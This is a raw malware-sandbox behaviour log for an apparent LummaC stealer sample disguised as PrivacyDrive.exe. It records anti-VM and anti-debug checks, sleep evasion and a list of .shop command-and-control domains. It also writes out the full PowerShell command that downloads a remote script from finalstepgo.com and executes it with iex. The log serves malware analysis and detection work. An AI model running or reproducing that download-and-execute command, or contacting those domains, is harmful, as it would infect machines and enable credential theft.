    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6753Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2978Jump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeAPI coverage: 1.4 %
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep count: 6753 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156Thread sleep count: 2978 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -11990383647911201s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 7132Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7000Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 2588Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00477BE0 FindFirstFileW,4_2_00477BE0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00495D80 FindFirstFileW,FindClose,4_2_00495D80
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Amcache.hve.12.drBinary or memory string: VMware
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
    Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: svchost.exe, 00000003.00000002.2895794367.0000024B03A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896731206.0000024B09052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895818846.0000024B03A2B000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`.a
    Source: Amcache.hve.12.drBinary or memory string: vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeAPI call chain: ExitProcess graph end nodegraph_4-88117
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeAPI call chain: ExitProcess graph end node
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_051E6730 LdrInitializeThunk,4_2_051E6730
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050E173 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_0050E173
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050E173 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,4_2_0050E173
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc,4_2_0050E640
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8055F mov edx, dword ptr fs:[00000030h]4_2_00F8055F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F80B1F mov eax, dword ptr fs:[00000030h]4_2_00F80B1F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8116E mov eax, dword ptr fs:[00000030h]4_2_00F8116E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F8116F mov eax, dword ptr fs:[00000030h]4_2_00F8116F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00F80ECF mov eax, dword ptr fs:[00000030h]4_2_00F80ECF
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7055F mov edx, dword ptr fs:[00000030h]8_2_00F7055F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F70B1F mov eax, dword ptr fs:[00000030h]8_2_00F70B1F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7116F mov eax, dword ptr fs:[00000030h]8_2_00F7116F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F7116E mov eax, dword ptr fs:[00000030h]8_2_00F7116E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 8_2_00F70ECF mov eax, dword ptr fs:[00000030h]8_2_00F70ECF
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_005068B4 GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,GetProcessHeap,4_2_005068B4
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_0050709C SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0050709C

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: PrivacyDrive.exeString found in binary or memory: surroundeocw.shop
    Source: PrivacyDrive.exeString found in binary or memory: covvercilverow.shop
    Source: PrivacyDrive.exeString found in binary or memory: pumpkinkwquo.shop
    Source: PrivacyDrive.exeString found in binary or memory: abortinoiwiam.shop
    Source: PrivacyDrive.exeString found in binary or memory: deallyharvenw.shop
    Source: PrivacyDrive.exeString found in binary or memory: priooozekw.shop
    Source: PrivacyDrive.exeString found in binary or memory: racedsuitreow.shop
    Source: PrivacyDrive.exeString found in binary or memory: defenddsouneuw.shop
    Source: PrivacyDrive.exeString found in binary or memory: candleduseiwo.shop
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4_2_00477990 SetWindowPos,GetWindowRect,GetCursorPos,ShowCursor,ShowCursor,SetCursorPos,mouse_event,mouse_event,mouse_event,SetCursorPos,ShowCursor,SetWindowPos,SetForegroundWindow,SetFocus,4_2_00477990
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $textJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" Jump to behavior
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,FileTimeToSystemTime,GetDateFormatW,GetTimeFormatW,4_2_00485BE0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetDateFormatW,GetTimeFormatW,4_2_00485D60
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
